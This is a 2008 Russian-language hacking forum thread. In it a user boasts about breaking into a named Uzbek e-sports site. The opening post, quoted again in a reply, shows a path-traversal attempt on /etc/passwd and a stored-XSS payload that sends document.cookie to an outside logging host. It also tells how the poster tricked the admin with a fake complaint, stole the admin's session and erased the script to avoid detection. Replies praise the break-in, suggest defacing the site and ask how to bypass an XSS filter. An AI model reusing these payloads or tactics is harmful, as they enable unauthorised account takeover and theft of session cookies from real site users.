Мой первый ВзлоМ!!!!
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Мой первый ВзлоМ!!!! - 2008-04-25 17:03:04.776666
|
|
|
chetlanen
Сообщений: 6
Оценки: 0
Присоединился: 2006-12-17 23:00:37.543333
|
Всем привет!!! Сегодня я вам расскажу про мой первый взлом.
Одним весенним вечером я гулял по просторам Интернета, как сам не заметил, что попал на сайт зоны .UZ. Это был сайт Esport.uz. что-то про электронный спорт в Ташкенте. И я решил зарегистрироваться и посмотреть что это такое. После регистрации я зашел на свои профиль, что бы заполнить данные и случайно посмотрел на адресную строку и увидел http://esport.uz/Your_Account/edit=profile.html и тут я решил поставить вместо profile.html вот такую строку ../../../../../../../../etc/passwd, но меня попросили гулять лесом, тогда я поставил <script>alert(document.cookie)</script> обновил страницу и увидел свои Куки. Я быстро зарегистрировался на сайте http://ccl.whiteacid.org и составил вот такой линк <script>document.location="[/color'>http://ccl.whiteacid.org/log.php?123456"+document.cookie</script> (где 123456 ваш личный номер). Проверил все работает, но я подумал, что надо искать дальше и нашел. Поля местонахождение, род занятий и клан также не фильтровались, а самое главное скрипт не показывался на странице.
Ну все было готово к взлому. Я быстро состряпал письмецо админу мол юзер не корректно ведет себя и кроет матом всех и в конце дал ссылку на его профиль. Админ зашел на страницу, и я тут же получил его куки и не долго думая я стер ядовитый скриптик, чтобы админ не заподозрил. Быстро редактнул свои куки и ВуАлЯ я админ.
|
|
|
|
|
RE: Мой первый ВзлоМ!!!! - 2008-04-25 18:12:58.553333
|
|
|
Antiavatar
Сообщений: 57
Оценки: 0
Присоединился: 2008-01-30 23:13:02.576666
|
А где докозательства? (выложил бы ты лудше скрин, где видно что ты действительно админ ) это во первых, а во вторых если ты думаеш что твою статью ( еще не факт что это ты действительно сделал) оценят, то ты ошибаешся.
|
|
|
|
|
RE: Мой первый ВзлоМ!!!! - 2008-04-25 18:40:37.656666
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
quote:
ORIGINAL: chetlanen
Всем привет!!! Сегодня я вам расскажу про мой первый взлом.
Одним весенним вечером я гулял по просторам Интернета, как сам не заметил, что попал на сайт зоны .UZ. Это был сайт Esport.uz. что-то про электронный спорт в Ташкенте. И я решил зарегистрироваться и посмотреть что это такое. После регистрации я зашел на свои профиль, что бы заполнить данные и случайно посмотрел на адресную строку и увидел http://esport.uz/Your_Account/edit=profile.html и тут я решил поставить вместо profile.html вот такую строку ../../../../../../../../etc/passwd, но меня попросили гулять лесом, тогда я поставил <script>alert(document.cookie)</script> обновил страницу и увидел свои Куки. Я быстро зарегистрировался на сайте http://ccl.whiteacid.org и составил вот такой линк <script>document.location="[/color'>http://ccl.whiteacid.org/log.php?123456"+document.cookie</script> (где 123456 ваш личный номер). Проверил все работает, но я подумал, что надо искать дальше и нашел. Поля местонахождение, род занятий и клан также не фильтровались, а самое главное скрипт не показывался на странице.
Ну все было готово к взлому. Я быстро состряпал письмецо админу мол юзер не корректно ведет себя и кроет матом всех и в конце дал ссылку на его профиль. Админ зашел на страницу, и я тут же получил его куки и не долго думая я стер ядовитый скриптик, чтобы админ не заподозрил. Быстро редактнул свои куки и ВуАлЯ я админ.
Поздравляю!
единственное я не понял зачем этот прикрепленный файл - смайлик?
А ты дефейсни сайтик, напиши "hacked by chetlanen" тогда даже скрин не потребуется…
зы. Антиаватар, я не думаю что нужно минусовать человека сразу… ведь прошло меньше получаса с того момента как ты попросил доказательства…имхо не каждый сидит за пк круглосуточно
|
|
|
|
|
RE: Мой первый ВзлоМ!!!! - 2008-04-25 22:50:34.800000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
не знаю, что это за админы такие, которые не слышали про strip_tags() и htmlspecialchars()
|
|
|
|
|
RE: Мой первый ВзлоМ!!!! - 2008-04-26 10:13:16.593333
|
|
|
chetlanen
Сообщений: 6
Оценки: 0
Присоединился: 2006-12-17 23:00:37.543333
|
quote:
ORIGINAL: Antiavatar
А где докозательства? (выложил бы ты лудше скрин, где видно что ты действительно админ ) это во первых, а во вторых если ты думаеш что твою статью ( еще не факт что это ты действительно сделал) оценят, то ты ошибаешся.
|
|
|
|
|
RE: Мой первый ВзлоМ!!!! - 2008-04-26 10:19:17.563333
|
|
|
chetlanen
Сообщений: 6
Оценки: 0
Присоединился: 2006-12-17 23:00:37.543333
|
Да я не собираюсь ничего доказывать. Мне не нужно чужого одобрения. :D
|
|
|
|
|
RE: Мой первый ВзлоМ!!!! - 2008-04-26 20:18:36.083333
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
quote:
ORIGINAL: chetlanen
Да я не собираюсь ничего доказывать. Мне не нужно чужого одобрения. :D
Да у тебя одобрения вроде никто и не просил…
Просто ты покажешь что здесь не одни домохозяйки остались, так, для общего развития
|
|
|
|
|
RE: Мой первый ВзлоМ!!!! - 2008-04-28 21:52:52.050000
|
|
|
Dimo4ka14
Сообщений: 394
Оценки: 1
Присоединился: 2006-11-28 19:55:15.336666
|
Крут
|
|
|
|
|
RE: Мой первый ВзлоМ!!!! - 2008-04-29 12:01:14.253333
|
|
|
novosibirec
Сообщений: 29
Оценки: 0
Присоединился: 2008-04-08 06:34:51.826666
|
Скорее всего не по теме! но все же нае нашел куда написать а ноовый создавать не хотелось! суть вопроса заключается в следущем при xss вот это выполняется "><script>alert(1245)</script> а вот если что то типа "><script>alert(%1245c)</script>
уже нет! как посоверуете обойти эту бяку и юзать хсску!?
P.S. ссылки на статьи мне кидать не стоит! начитался и знаю что и как! гугль результатов не дает!
|
|
|
|
|
|
